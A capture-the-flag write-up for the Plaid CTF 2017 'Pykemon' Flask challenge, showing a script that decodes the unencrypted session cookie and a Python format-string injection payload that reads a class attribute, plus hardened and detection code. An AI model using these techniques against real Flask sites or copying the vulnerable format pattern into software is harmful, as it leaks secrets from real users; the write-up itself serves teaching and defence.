Plaid CTF 2017: Pykemon Writeup

Solved by HRJ

The challenge was great, and it had two ways of solving it. We were given a website on which we can catch a Pokemon, rename a Pokemon, see all our Pokemon and buy Pokeballs.


We were also given the source code of the website, which was written using Flask (Link). There were many Pokemon, and FLAG was one of them; we can understand that by seeing the write-up. The flag was stored in the description of the Pokemon ‘FLAG’.

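The first way of solving the challenge is by decoding the Flask session cookie. Flask's default session cookie is signed but not encrypted, so its contents can be read without the secret key. We first base64-decode the cookie and then zlib-decompress it.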

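import zlib
from itsdangerous import base64_decode

cookie = "<session cookie>"

# A leading "." marks a zlib-compressed payload; strip it
cookie = cookie[1:]
# The payload is the first "."-separated part; the rest is timestamp and signature
cookie = zlib.decompress(base64_decode(cookie.split(".")[0]))
print(cookie.decode())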

By reading the source code we can get the HP of the FLAG. The above script will return the description of all the Pokemon. We know the ‘pid’ of the FLAG is ‘FLAG90’. We grep for the pid and find the flag.


The next way is exploiting the format function in Python (Link).

I didn’t have any idea regarding this vulnerability; it was great learning for me. We can control the input which is passed while renaming a Pokemon, and the input is directly passed to the format function without any validation. Whoever controls the format string can potentially access internal attributes of objects.

>>> 'class of {0} is {0.__class__}'.format(42)
"class of 42 is <class 'int'>"

By accessing the list pykemon in the Pykemon class you can get the flag. For that, you have to pass the name as: {0.__class__.pykemon}
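The flaw described above, next to a safer form, as an added example that is not the challenge's source code. The `Pykemon` class, its sample data and the function names `rename_vulnerable`, `rename_literal` and `has_format_fields` are assumptions constructed for illustration.

```python
import string


class Pykemon:
    # Constructed stand-in for the challenge class: a class-level list that
    # holds a secret entry (placeholder value, not the real flag).
    pykemon = [
        {"name": "Pykachu", "description": "electric mouse"},
        {"name": "FLAG", "description": "PCTF{placeholder}"},
    ]

    def __init__(self, name):
        self.name = name


def rename_vulnerable(p, new_name):
    # User input is used as the format *template*, so replacement fields in
    # it are resolved against the object passed to format().
    p.name = new_name.format(p)
    return p.name


def rename_literal(p, new_name):
    # Hardened: the template is a constant and the input is only data.
    p.name = "{}".format(new_name)
    return p.name


def has_format_fields(text):
    # Defensive check: True if the input contains any replacement field.
    # Escaped braces ("{{" and "}}") do not count as fields.
    try:
        return any(field is not None
                   for _, field, _, _ in string.Formatter().parse(text))
    except ValueError:
        # Unbalanced braces are not a valid template; reject them too.
        return True


if __name__ == "__main__":
    name = "{0.__class__.pykemon}"
    print(rename_vulnerable(Pykemon("a"), name))  # class-level list is exposed
    print(rename_literal(Pykemon("a"), name))     # stored verbatim
    print(has_format_fields(name))
```
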

